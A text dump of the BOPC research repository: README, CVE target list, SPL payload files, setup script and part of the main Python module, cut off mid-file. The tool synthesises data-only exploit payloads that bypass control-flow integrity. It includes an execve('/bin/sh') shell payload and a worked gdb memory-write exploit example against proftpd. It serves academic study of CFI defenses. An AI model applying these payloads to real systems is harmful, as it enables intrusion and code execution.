Full Code of HexHive/BOPC for AI

master dc98173b4baf cached
44 files
590.8 KB
132.7k tokens
215 symbols
1 requests
Download .txt
Showing preview only (610K chars total). Download the full file or copy to clipboard to get everything.
Repository: HexHive/BOPC
Branch: master
Commit: dc98173b4baf
Files: 44
Total size: 590.8 KB

Directory structure:
gitextract_g5a28eqg/

├── README.md
├── evaluation/
│   ├── README.md
│   ├── ghttpd
│   ├── httpd
│   ├── lt-wireshark
│   ├── nginx1
│   ├── nullhttpd
│   ├── opensshd
│   ├── orzhttpd
│   ├── proftpd
│   ├── smbclient
│   ├── sudo
│   └── wuftpd
├── payloads/
│   ├── README.md
│   ├── abloop.spl
│   ├── execve.spl
│   ├── ifelse.spl
│   ├── infloop.spl
│   ├── loop.spl
│   ├── memrd.spl
│   ├── memwr.spl
│   ├── print.spl
│   ├── regmod.spl
│   ├── regref4.spl
│   ├── regref5.spl
│   ├── regset4.spl
│   └── regset5.spl
├── setup.sh
└── source/
    ├── BOPC.py
    ├── README.md
    ├── absblk.py
    ├── calls.py
    ├── capability.py
    ├── compile.py
    ├── config.py
    ├── coreutils.py
    ├── delta.py
    ├── map.py
    ├── mark.py
    ├── optimize.py
    ├── output.py
    ├── path.py
    ├── search.py
    └── simulate.py

================================================
FILE CONTENTS
================================================

================================================
FILE: README.md
================================================


# Block Oriented Programming Compiler (BOPC)

___


## What is BOPC

**NEW:** The talk from CCS'18 presentation is available
[here](https://www.youtube.com/watch?v=iK7jhrK5uyg).



BOPC (stands for _BOP Compiler_) is a tool for automatically synthesizing arbitrary,
Turing-complete, _Data-Only_ payloads. BOPC finds execution traces in the binary that
execute the desired payload while adhering to the binary's Control Flow Graph (CFG).
This implies that the existing control flow hijacking defenses are not sufficient to
detect this style of execution, as execution does never violates the Control Flow
Integrity (CFI).

Essentially, we can say that Block Oriented Programming is _code reuse under CFI_. 

BOPC works with basic blocks (hence the name "block-oriented"). What it does is to find
a set of _functional_ blocks (i.e., blocks that perform useful computations). This step
is somewhat similar with finding Return Oriented Programming (ROP) gadgets.
Having the functional blocks, BOPC looks for _dispatcher_ blocks to that are used to
stitch functional blocks together. Compared to ROP (that we can move from one gadget
to the next without any limitation), here we can't do that as it would violate the CFI.
Instead, BOPC finds a proper sequence for dispatcher blocks that naturally lead the
execution from one functional block to the next one.
Unfortunately the problem of building _Data-Only_ payloads is NP-hard. 
However it turns out that in practice BOPC finds solution in a reasonable amount
of time.


For more details on how BOPC works, please refer to our [paper](./ccs18_paper.pdf),
and our [slides](./ccs18_slides.pdf) from CCS'18.


To operate, BOPC requires 3 inputs:
* A target binary that has an _Arbitrary Memory Write_ (AWP) vulnerability (**hard requirement**)
* The desired payload, expressed in a high level language called SPL (stands for _SPloit Language_)
* The so-called "_entry point_", which is the first instruction in the binary that the
payload execution should start. There can be more than one entry points and determining it is
part of the vulnerability discovery process.


The output of BOPC is a set of "what-where" memory writes that indicate how the memory 
should be initialized (i.e., what values to write at which memory addresses). 
When the execution reaches the entry point and the memory is initialized according to
the output of BOPC, the target binary execute the desired payload instead of continuing
the original execution.


**Disclaimer:** This is a research project coded by a single guy. It's not a product,
so do **not** expect it to work perfectly under all scenarios. It works nicely for the
 provided test cases, but beyond that we cannot guarantee that will work as expected.

___


## Installation
Just run `setup.sh` :)

___


## How to use BOPC

BOPC started as a hacky project, so several changes made to adapt it into an scientific
context. That is, the implementation in the [paper](./ccs18_paper.pdf) is slightly
different from the actual implementation, as we omitted several implementation details
from the paper. The actual implementation overview is shown below:
![alt text](./source/images/BOPC_overview.png)



### Command line arguments explained

A good place to start are the command line arguments:

```
usage: BOPC.py [-h] [-b BINARY] [-a {save,load,saveonly}] [--emit-IR] [-d]
               [-dd] [-ddd] [-dddd] [-V] [-s SOURCE] [-e ENTRY]
               [-O {none,ooo,rewrite,full}] [-f {raw,idc,gdb}] [--find-all]
               [--mapping-id ID] [--mapping MAP [MAP ...]] [--enum-mappings]
               [--abstract-blk BLKADDR] [-c OPTIONS [OPTIONS ...]]

optional arguments:
  -h, --help            show this help message and exit

General Arguments:
  -b BINARY, --binary BINARY
                        Binary file of the target application
  -a {save,load,saveonly}, --abstractions {save,load,saveonly}
                        Work with abstraction file
  --emit-IR             Dump SPL IR to a file and exit
  -d                    Set debugging level to minimum
  -dd                   Set debugging level to basic (recommended)
  -ddd                  Set debugging level to verbose (DEBUG ONLY)
  -dddd                 Set debugging level to print-everything (DEBUG ONLY)
  -V, --version         show program's version number and exit

Search Options:
  -s SOURCE, --source SOURCE
                        Source file with SPL payload
  -e ENTRY, --entry ENTRY
                        The entry point in the binary that payload starts
  -O {none,ooo,rewrite,full}, --optimizer {none,ooo,rewrite,full}
                        Use the SPL optimizer (Default: none)
  -f {raw,idc,gdb}, --format {raw,idc,gdb}
                        The format of the solution (Default: raw)
  --find-all            Find all the solutions

Application Capability:
  -c OPTIONS [OPTIONS ...], --capability OPTIONS [OPTIONS ...]
                        Measure application's capability. Options (can be many)
                        
                        all	Search for all Statements
                        regset	Search for Register Assignments
                        regmod	Search for Register Modifications
                        memrd	Search for Memory Reads
                        memwr	Search for Memory Writes
                        call	Search for Function/System Calls
                        cond	Search for Conditional Jumps
                        load	Load capabilities from file
                        save	Save capabilities to file
                        noedge	Dump statements and exit (don't calculate edges)

Debugging Options:
  --mapping-id ID       Run the Trace Searching algorithm on a given mapping ID
  --mapping MAP [MAP ...]
                        Run the Trace Searching algorithm on a given register mapping
  --enum-mappings       Enumerate all possible mappings and exit
  --abstract-blk BLKADDR
                        Abstract a specific basic block and exit
```

Ok, there are a lot of options here (divided into 4 categories) as BOPC can do several things.

Let's start with the **General Arguments**. To avoid working directly with assembly, BOPC,
"abstracts" each basic block into a set of "actions". For more details, please check
[absblk.py](./source/absblk.py). Abstraction process symbolically executes each basic block
in the binary and carefully monitors its actions. The abstraction process can take from a few
minutes (for small binaries) to several hours (for the larger ones). Waiting that much every
time that you want to run BOPC does not sound a good idea, so BOPC uses an old trick: _caching_.

The abstraction process depends on the binary and not on the SPL payload nor the entry point,
so we only need to calculate them *once* per binary. Therefore, we have to calculate the
abstractions only one time, then save them into a file and each time loading them. 
The `save` and `saveonly` options save the abstractions into a file. The only difference is that
`saveonly` halts execution after it saves the abstractions, while `save` continues to search
for a solution. As you can guess, the `load` option loads the abstractions from a file.

The `--emit-IR` option is used to "dump" the IR representation of the SPL payload (this is
another intermediate result that you should not worry about it).

BOPC provides 5 verbosity levels: no option, `-d`, `-dd`, `-ddd` and `-dddd`. I recommend you
to use either the `-dd` or the `-ddd` to get a detailed progress status.

Let's get into the **Search Options** options. The most important arguments here are the
`--source` (which is a file that contains the SPL payload) and the `--entry` which is an
address inside the binary that indicates the entry point. Trace searching starts from the
entry point, so this is quite important.


The optimizer (`-O` option) is double edge knife. On the one hand, it optimizes the SPL
payload to make it more flexible. This means that it increases the likelihood to find a
solution. On the other hand, the search space (along with the execution time) is increased.
The decision is up to the user, hence the use of optimizer is optional. The 2 possible
optimizations are the _out of order execution_ (`ooo` option) and the _statement rewriting_
(`rewrite` option). 


The out-of-order optimization reorders payload statements.
Consider for example the following SPL payload:
```
	__r0 = 13;
	__r1 = 37;
```

To find a solution here, BOPC must find a functional block for the first statement (`__r0 = 13`)
then a functional block for the second statement (`__r1 = 37`) and a set of dispatcher blocks
to connect these two statements. However these functional blocks may be far apart so a dispatcher
may not exist. However there's no difference if you execute the `__r0 = 13` statement first
or second as it does not have any dependencies with the other statement. Thus if we rewrite
the payload as follows:
```
	__r1 = 37;
	__r0 = 13;
```

It may be possible to find another set dispatcher blocks, hopefully much smaller 
(path `A -> B` may be much longer than path `B -> A`) and find a solution.

Internally, this is a **two-step** process. First the optimizer **groups** independent
statements together (for more details take a look [here](./source/optimize.py)) and
generated and augmented SPL IR. Then, the trace search module, permutes statements
within each group, each time resulting in a different SPL payload. However all these
payloads are equivalent. As you can guess there are can be an exponential number of 
permutations, so this can take forever. To alleviate that, you can adjust
`N_OUT_OF_ORDER_ATTEMPTS` configuration parameter and tell BOPC to stop after trying 
**N** iterations, instead of trying all of them.



The statement rewriting is an under development optimization that rewrites
some statements that do not exist in the binary. For instance if the SPL payload
spawns a shell through 'execve()' but the target binary does not invoke
`execve()` at all, then BOPC fails as there are no functional blocks for that statement.
However, if the target binary invokes `execv()`, it may be possible to find a solution
by replacing `execve()` with `execv()`. The optimizer contains a list of possible replacements,
and adjust payload accordingly.


As we already explained, the output of BOPC is a set of "what-where" memory writes. There
are several ways to express the output. For instance they can be raw lines containing the
address, the value and the size of the data that should be written in memory. Or they can
be a gdb/IDA script that can run directly on the debugger and modify the memory accordingly.
The last option is the best one as it you only need to run the BOPC output into the debugger.
Currently only the `gdb` format is implemented.



The **Application Capability** options used to measure _Application's capabilities_, that
gives us upper bounds on **what** payloads the target binary is capable of executing.


Finally the **Debugging Options** assist the audit/debugging/development process. They are used
to bypass parts of the BOP work-flow. Do not use them unless you're doing changes in the code.
Recall that BOPC finds a mapping between virtual and host registers along with a mapping
between SPL variables and underlying memory addresses. If that mapping does not lead to
a solution it goes back and tries another one. If you want to focus on a specific mapping
(e.g., let's say that code crashes at mapping 458), you don't have to wait for BOPC to try
the first 457 mappings first. By supplying the `--mapping-id=458` option you can skip
all mappings and focus on that one. In case that you don't know the mapping number but you
know the actual mapping you can instead you the `--mapping` option: `--mapping=`__r0=rax __r1=rbx`



Finally, BOPC has a lot of configuration options. You see all of them in 
[config.py](./source/config.py) and adjust them according to our needs. The default
values are a nice trade off between accuracy and performance that I found during
then evaluation.


## Example

Let's see now how to actually use BOPC. The first thing to do is to get the basic block
abstractions. This step is optional, but I expect that you are going to run BOPC several times,
so it's a good idea to get the abstractions first:
```
./source/BOPC.py -dd --binary $BINARY --abstractions saveonly
```

This calculates the abstractions and saves them into a  file named `$BINARY.abs`. Don't forget
to enable debugging to see the status on the screen.


Writing an SPL payload is pretty much like writing C:
```C
void payload() 
{ 
    string prog = "/bin/sh\0";
    int argv    = {&prog, 0x0};

    __r0 = &prog;
    __r1 = &argv;
    __r2 = 0;
    
    execve(__r0, __r1, __r2);
}
```


Please take a look at the available [payloads](./payloads) to see all features of SPL.
Don't expect to write crazy program with SPL; Yes, in theory you can write any program.
In practice the more complicated is the SPL payload, the more the complexity increases
and the harder it gets to find a solution.


Running BOPC is as simple as the following:
```
./source/BOPC.py -dd --binary $BINARY --source $PAYLOAD --abstractions load \
--entry $ENTRY --format gdb
```

If everything goes well an `*.gdb` file will be created that contains the set of memory writes
to execute the desired payload.


### Pruning search space

A common problem is that there can be thousands of mappings (it's exponential based on the 
number of registers and variables that are used). Each mapping can take up to a minute to test
(assuming out of order execution and other optimizations), so BOPC may run for days.

However, if you know approximately where a solution could be, you can ask BOPC to quickly find
(and verify) it, without trying all mappings. Let's assume that you want to execute the following
SPL payload:
```C
void payload() 
{ 
    string msg = "This is my random message! :)\0";

    __r0 = 0;
    __r1 = &msg;
    __r2 = 32;

    write( __r0, __r1, __r2 );
}
```

Because we have a system call, we know the register mapping: 
`__r0 <-> rdi, __r1 <-> rsi, __r2 <-> rdx`.

Let's assume that we're on `proftpd` binary which contains the following "all-in-one"
functional block:
```Assembly
.text:000000000041D0B5 loc_41D0B5:
.text:000000000041D0B5        mov     edi, cs:scoreboard_fd ; fd
.text:000000000041D0BB        mov     edx, 20h        ; n
.text:000000000041D0C0        mov     esi, offset header ; buf
.text:000000000041D0C5        call    _write
```

The abstractions for this basic block, will be the following (recall that to get the
abstractions for a single basic block, you need to pass the `--abstract-blk 0x41D0B5`
in the command line).
```
[22:02:07,822] [+] Abstractions for basic block 0x41d0b5:
[22:02:07,823] [+]          regwr :
[22:02:07,823] [+] 		rsp = {'writable': True, 'const': 576460752303359992L, 'type': 'concrete'}
[22:02:07,823] [+] 		rdi = {'sym': {}, 'memrd': None, 'type': 'deref', 'addr': <BV64 0x66e9e0>, 'deps': []}
[22:02:07,823] [+] 		rsi = {'writable': True, 'const': 6787008L, 'type': 'concrete'}
[22:02:07,823] [+] 		rdx = {'writable': False, 'const': 32L, 'type': 'concrete'}
[22:02:07,823] [+]          memrd : set([(<SAO <BV64 0x66e9e0>>, 32)])
[22:02:07,823] [+]          memwr : set([(<SAO <BV64 0x7ffffffffff07f8>>, <SAO <BV64 0x41d0ca>>)])
[22:02:07,823] [+]          conwr : set([(576460752303359992L, 64)])
[22:02:07,823] [+]       splmemwr : []
[22:02:07,823] [+]           call : {}
[22:02:07,823] [+]           cond : {}
[22:02:07,823] [+]        symvars : {}
[22:02:07,823] [*] 
```

Here, `__r0 <-> rdi` is loaded indirectly and the value of `__r1 <-> rsi` (which holds the `msg` 
variable) is `6787008` or `0x678fc0` in hex. Then we enumerate all possible mappings with the
`--enum-mappings` option. Here, there are *287* possible mappinges, but there are instances that
we have thousands of mappings:


If we look at the output we can quickly search for the appropriate mapping, which in our case
is mapping *#89*:
```
[.... TRUNCATED FOR BREVITY ....]
[21:59:28,471] [*] Trying mapping #88:
[21:59:28,471] [*] 	Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
[21:59:28,471] [*] 	Variables: msg <-> *<BV64 0x7ffffffffff1440>
[21:59:28,614] [*] Trying mapping #89:
[21:59:28,614] [*] 	Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
[21:59:28,614] [*] 	Variables: msg <-> 0x678fc0L
[21:59:28,762] [*] Trying mapping #90:
[21:59:28,762] [*] 	Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
[21:59:28,762] [*] 	Variables: msg <-> *<BV64 r12_56287_64 + 0x28>
[.... TRUNCATED FOR BREVITY ....]
[22:00:04,709] [*] Trying mapping #287:
[22:00:04,709] [*] 	Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
[22:00:04,709] [*] 	Variables: msg <-> *<BV64 __add__(((0#32 .. rbx_294059_64[31:0]) << 0x5), r12_294068_64, 0x10)>
[22:00:04,979] [+] Trace searching algorithm finished with exit code 0
```

Now that we know the actual mapping, we can tell BOPC to focus on this one. All we have to
do is to pass the `--mapping-id 89` option.


We run this and after 1 minute and 51 seconds later, we get the solution:
```
#
# This file has been created by BOPC at: 29/03/2018 22:04
# 
# Solution #1
# Mapping #89
# Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
# Variables: msg <-> 0x678fc0L
# 
# Simulated Trace: [(0, '41d0b5', '41d0b5'), (4, '41d0b5', '41d0b5'), (6, '41d0b5', '41d0b5'), (8, '41d0b5', '41d0b5'), (10, '41d0b5', '41d0b5')]
# 

break *0x403740
break *0x41d0b5

# Entry point
set $pc = 0x41d0b5 

# Allocation size is always bigger (it may not needed at all)
set $pool = malloc(20480)

# In case that rbp is not initialized
set $rbp = $rsp + 0x800 

# Stack and frame pointers aliases
set $stack = $rsp 
set $frame = $rbp 

set {char[30]} (0x678fc0) = {0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x6d, 0x79, 0x20, 0x72, 0x61, 0x6e, 0x64, 0x6f, 0x6d, 0x20, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x21, 0x20, 0x3a, 0x29, 0x00}

set {char[8]} (0x66e9e0) = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
```

Let's take a closer look here. The _Simulated Trace_ comment shows the path that BOPC followed.
This is a list of `($pc, $src, $dst)` tuples. `$pc` is the program counter of the SPL statement.
`$src` is the address of the functional block for the current SPL statement and `$dst` is the
address of the next functional block.


Before it runs, script adjusts `$rip` to point to the entry point, and makes sure that
stack pointers (`$rsp`, `$rbp`) are valid. It also allocates a "variable pool" (for
more details please look at [simulate.py](./source/simulate.py)) which in our case is not
used.

Then we have the two actual memory writes at `0x678fc0` and at `0x66e9e0`. If you load
the binary in gdb and run this script you will see your payload being executed:

```
(gdb) break main
Breakpoint 5 at 0x4041a0
(gdb) run
Starting program: /home/ispo/BOPC/evaluation/proftpd 

Breakpoint 1, 0x00000000004041a0 in main ()
(gdb) continue
Continuing.

Breakpoint 3, 0x000000000041d0b5 in pr_open_scoreboard ()
(gdb) continue
Continuing.

Breakpoint 2, 0x0000000000403740 in write@plt ()
(gdb) continue
Continuing.
This is my random message! :)
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffde60 in ?? ()
```

Note that BOPC stops after executing the desired payload (hence the crash). If you
want to avoid this situation you can use the `returnto` SPL statement to naturally
transfer execution to a safe location.



### Measuring application capabilities

**NOTE:** This is a new concept, which is not mentioned in the paper. 

Beyond finding Data-Only payloads, BOPC provides some basic capability measurements.
Although it is not related to the Block Oriented Programming, it can provide upper
bounds and strong "indications" on what types of payloads can be executed and what
are not. This is very useful as we can quickly find types of payloads that **cannot**
be executed in the target binary.  
To get the all application capabilities run the following code:
```
./source/BOPC.py -dd --binary $BINARY --abstractions load --capability all save
```

If you want to simply dump all functional gadgets for a specific statement, you can do
it as follows:
```
./source/BOPC.py -dd --binary $BINARY --abstractions load --capability $STMT noedge
```

Where `$STMT` can be one ore more from `{all, regset, regmod, memrd, memwr, call, cond}`.
The `noedge` option is to boost things up (essentially it does not calculate edges in the
capability graph; Each node in the capability graph represents a functional block from
the binary while and edge represents the context-sensitive shortest path distance
between two functional blocks).


___


## Final Notes (please read them carefully!)

* When the symbolic execution engine deals with filesystem (i.e., it has to `open` a file),
we have to provide it a valid file. Filename is defined in `SYMBOLIC_FILENAME` in 
[coreutils.py](./source/coreutils.py).

* If you want to visualize things, just uncomment the code in search.py. I'm too lazy to add
CLI flags to trigger it :P

* In case that addresses used by concolic execution do not work, adjust them from 
[simulate.py](./source/simulate.py)

* Make sure that `$rsp` is consistent in `dump()` in [simulate.py](./source/simulate.py)

* For any questions/concerns regarding the code, you can contact [ispo](https://github.com/ispoleet)

___



================================================
FILE: evaluation/README.md
================================================


# Block Oriented Programming Compiler (BOPC)
___


### Vulnerable Application Overview


| Application                | CVE           |
|----------------------------|---------------|
|[ProFTPd](./proftpd)        | CVE-2006-5815 |
|[nginx](./nginx1)           | CVE-2013-2028 |
|[sudo](./sudo)              | CVE-2012-0809 |
|[orzhttpd](./orzhttpd)      | BugtraqID 41956 |
|[wuftdp](./wuftpd)          | CVE-2000-0573 |
|[nullhttpd](./nullhttpd)    | CVE-2002-1496 |
|[opensshd](./opensshd)      | CVE-2001-0144 |
|[wireshark](./lt-wireshark) | CVE-2014-2299 |
|[apache](./httpd)           | CVE-2006-3747 |
|[smbclient](./smbclient)    | CVE-2009-1886 |

___


================================================
FILE: payloads/README.md
================================================


# Block Oriented Programming Compiler (BOPC)
___


### SPL Payload Overview


| Payload                  | Description                                 |
|--------------------------|---------------------------------------------|
| [regset4](./regset4.spl) | Initialize 4 registers with arbitrary values |
| [regref4](./regref4.spl) | Initialize 4 registers with pointers to arbitrary memory |
| [regset5](./regset5.spl) | Initialize 5 registers with arbitrary values |
| [regref5](./regref5.spl) | Initialize 5 registers with pointers to arbitrary memory |
| [regmod](./regmod.spl)   | Initialize a register with an arbitrary value and modify it |
| [memrd](./memrd.spl)     | Read from arbitrary memory |
| [memwr](./memwr.spl)     | Write to arbitrary memory |
| [print](./print.spl)     | Display a message to stdout using write |
| [execve](./execve.spl)   | Spawn a shell through execve |
| [abloop](./abloop.spl)   | Perform an arbitrarily long bounded loop utilizing regmod |
| [infloop](./infloop.spl) | Perform an infinite loop that sets a register in its body |
| [ifelse](./ifelse.spl)   | An if-else condition based on a register comparison |
| [loop](./loop.spl)       | Conditional loop with register modification |


___


================================================
FILE: payloads/abloop.spl
================================================
// 
// BOPC Evaluation
//
// Arbitrary bounded loop with register modification
//
void payload() 
{ 
    __r0 = 0;

LOOP:

    __r0 += 1;

    goto LOOP;
}



================================================
FILE: payloads/execve.spl
================================================
// 
// BOPC Evaluation
//
// execve('/bin/sh') payload
//
void payload() 
{ 
    string prog = "/bin/sh\0";
    int argv    = {&prog, 0x0};

    __r0 = &prog;
    __r1 = &argv;
    __r2 = 0;
    
    execve(__r0, __r1, __r2);

    // return ?
}


================================================
FILE: payloads/ifelse.spl
================================================
// 
// BOPC Evaluation
//
// Simple if-else condition
//
void payload() 
{ 
    __r0 = 0;

    if (__r0 != 0 ) goto SKIP;

    __r1 = 1;

    goto END;

SKIP:
    __r1 = 0;


END:
    // return 0x400ca7;
    __r0 = 0;

}


================================================
FILE: payloads/infloop.spl
================================================
// 
// BOPC Evaluation
//
// Infinity loop with constant assignment
//
void payload() 
{ 

//  __r0 = 1;

LOOP:
    __r1 = 0;

    goto LOOP;
}


================================================
FILE: payloads/loop.spl
================================================
// 
// BOPC Evaluation
//
// Simple loop
//
void payload() 
{ 
    __r0 = 0;

LOOP:
    __r0 += 1;

    if (__r0 != 3 ) goto LOOP;
}


================================================
FILE: payloads/memrd.spl
================================================
// 
// BOPC Evaluation
//
// Memory Load
//
void payload() 
{ 
    int array = {1, 2, 3, 4, 5};
    
    __r1 = &array;

    __r0 = *__r1;

}


================================================
FILE: payloads/memwr.spl
================================================
// 
// BOPC Evaluation
//
// Memory Store
//
void payload() 
{ 
    int array = {1, 2, 3, 4, 5};
    
    __r0 = &array;
    __r1 = 0;

    *__r0 = __r1;

}


================================================
FILE: payloads/print.spl
================================================
// 
// BOPC Evaluation
//
// Print an arbitrary message to stdout using write()
//
void payload() 
{ 
    string msg = "This is my random message! :)\0";

    __r0 = 0;
    __r1 = &msg;
    __r2 = 1;


    write( __r0, __r1, __r2 );

    // return 0x?? ;s
}


================================================
FILE: payloads/regmod.spl
================================================
// 
// BOPC Evaluation
//
// Register modification
//
void payload() 
{ 
    __r0 = 0;

    __r0 += 1;
}


================================================
FILE: payloads/regref4.spl
================================================
// 
// BOPC Evaluation
//
// Initialize 4 registers with references
//
void payload() 
{ 
    int    var_a = 0x100;
    string var_b = "this is a random string";
    int    var_c = {1, 2, 3, &var_a, 4, &var_b};
    int    var_d = &var_c;

    __r0 = &var_a;
    __r1 = &var_b;
    __r2 = &var_c;
    __r3 = &var_d;
}


================================================
FILE: payloads/regref5.spl
================================================
// 
// BOPC Evaluation
//
// Initialize 5 registers with references
//
void payload() 
{ 
	long   var_a = 0x100;
	string var_b = "this is a random string\x00";

	long    *var_c = {1, 2, 3, 4, &var_a, &var_b};
	long    var_d = &var_c;
	long    *var_e = {&var_d, &var_d, &var_d};

	__r0 = &var_a;
	__r1 = &var_b;
	__r2 = &var_c;
	__r3 = &var_d;
	__r4 = &var_e;

	// return ??
}


================================================
FILE: payloads/regset4.spl
================================================
// 
// BOPC Evaluation
//
// Initialize 4 registers
//
void payload() 
{ 
    __r0 = 0;
    __r1 = 1;
    __r2 = 2;
    __r3 = 3;
}


================================================
FILE: payloads/regset5.spl
================================================
// 
// BOPC Evaluation
//
// Initialize 5 registers
//
void payload() 
{ 
    __r0 = 0;
    __r1 = 1;
    __r2 = 2;
    __r3 = 3;
    __r4 = 4;
}


================================================
FILE: setup.sh
================================================
#!/bin/bash
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
msg() {
    GREEN='\033[01;32m'                         # bold green
    NC='\033[0m'                                # no color
    echo -e "${GREEN}[INFO]${NC} $1"
}

error() {
    RED='\033[01;31m'                           # bold red
    NC='\033[0m'                                # no color
    echo -e "${RED}[ERROR]${NC} $1"
}


# display fancy foo
clear
echo
echo -e '\t%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'
echo -e '\t%                                                                    %'
echo -e '\t%                :::::::::   ::::::::  :::::::::   ::::::::          %'
echo -e '\t%               :+:    :+: :+:    :+: :+:    :+: :+:    :+:          %'
echo -e '\t%              +:+    +:+ +:+    +:+ +:+    +:+ +:+                  %'
echo -e '\t%             +#++:++#+  +#+    +:+ +#++:++#+  +#+                   %'
echo -e '\t%            +#+    +#+ +#+    +#+ +#+        +#+                    %'
echo -e '\t%           #+#    #+# #+#    #+# #+#        #+#    #+#              %'
echo -e '\t%          #########   ########  ###         ########                %'
echo -e '\t%                                                                    %'
echo -e '\t%                Block Oriented Programming Compiler                 %'
echo -e '\t%                                                                    %'
echo -e '\t%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'
echo 
msg "BOPC Installation Guide has been started ..."


# base check (we need root)
if [ "$EUID" -ne 0 ]; then
    error "Script needs root permissions to install the required packages."
    msg "Please run as 'sudo $0' (you can have a look at the source, if you don't trust me)"
    echo

    exit
fi

# install prerequisites first
apt-get install --yes python-pip
apt-get install --yes graphviz libgraphviz-dev
apt-get install --yes pkg-config python-tk 


# install pip packages
pip install angr==7.8.9.26
pip install claripy==7.8.9.26
pip install matplotlib
pip install simuvex
# networkx must be installed after simuvex and angr, since they depend
# on networkx 2.1
pip install networkx==1.11
pip install graphviz==0.8.1
pip install pygraphviz==1.3.1


msg "BOPC Installation completed ..."
msg "Have a nice day :)"
echo

# -------------------------------------------------------------------------------------------------


================================================
FILE: source/BOPC.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
# BOPC.py:
#
#
# This is the main module of BOPC. It configures the environment and launches the other modules.
#
# -------------------------------------------------------------------------------------------------
from coreutils import *
import absblk     as A
import compile    as C
import optimize   as O
import mark       as M
import search     as S
import capability as P

import argparse
import textwrap
import ntpath
import angr
import os
import sys



# ------------------------------------------------------------------------------------------------
# Constant Definitions
# ------------------------------------------------------------------------------------------------
VERSION  = 'v2.1'                                   # current version
comments = ''                                       # Additional comments to display on startup



# -------------------------------------------------------------------------------------------------
# parse_args(): This function processes the command line arguments.
#
# :Ret: None.
#
def parse_args():
    # create the parser object and the groups
    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)

    group_g = parser.add_argument_group('General Arguments')
    group_s = parser.add_argument_group('Search Options')
    group_c = parser.add_argument_group('Application Capability')
    group_d = parser.add_argument_group('Debugging Options')


    # -------------------------------------------------------------------------
    # Group for general arguments
    # -------------------------------------------------------------------------
    group_g.add_argument(
        '-b', "--binary",
        help     = "Binary file of the target application",
        action   = 'store',
        dest     = 'binary',
        required = False, # True
    )

    group_g.add_argument(
        '-a', "--abstractions",
        help     = "Work with abstraction file",
        choices  = ['save', 'load', 'saveonly'],
        default  = 'none',
        action   = 'store',
        dest     = 'abstractions',
        required = False
    )

    group_g.add_argument(
        "--emit-IR",
        help     = "Dump SPL IR to a file and exit",
        action   = 'store_const',
        const    = True,
        dest     = 'emit_IR',
        required = False
    )

    # action='count'
    group_g.add_argument(
        '-d',
        help     = "Set debugging level to minimum",
        action   = 'store_const',
        const    = DBG_LVL_1,
        dest     = 'dbg_lvl',
        required = False
    )

    group_g.add_argument(
        '-dd',
        help     = "Set debugging level to basic (recommended)",
        action   = 'store_const',
        const    = DBG_LVL_2,
        dest     = 'dbg_lvl',
        required = False
    )

    group_g.add_argument(
        '-ddd',
        help     = "Set debugging level to verbose (DEBUG ONLY)",
        action   = 'store_const',
        const    = DBG_LVL_3,
        dest     = 'dbg_lvl',
        required = False
    )

    group_g.add_argument(
        '-dddd',
        help     = "Set debugging level to print-everything (DEBUG ONLY)",
        action   = 'store_const',
        const    = DBG_LVL_4,
        dest     = 'dbg_lvl',
        required = False
    )

    group_g.add_argument(
        '-V', "--version",
        action   = 'version',
        version  = 'BOPC %s' % VERSION
    )


    # -------------------------------------------------------------------------
    # Group for searching arguments
    # -------------------------------------------------------------------------
    group_s.add_argument(
        '-s', "--source",
        help     = "Source file with SPL payload",
        action   = 'store',
        dest     = 'source',
        required = False
    )

    group_s.add_argument(
        '-e', "--entry",
        help     = "The entry point in the binary that payload starts",
        action   = 'store',
        dest     = 'entry',
        required = False
    )

    group_s.add_argument(
        '-O', "--optimizer",
        help     = "Use the SPL optimizer (Default: none)",
        choices  = ['none', 'ooo', 'rewrite', 'full'],
        action   = 'store',
        default  = 'none',
        dest     = 'optimizer',
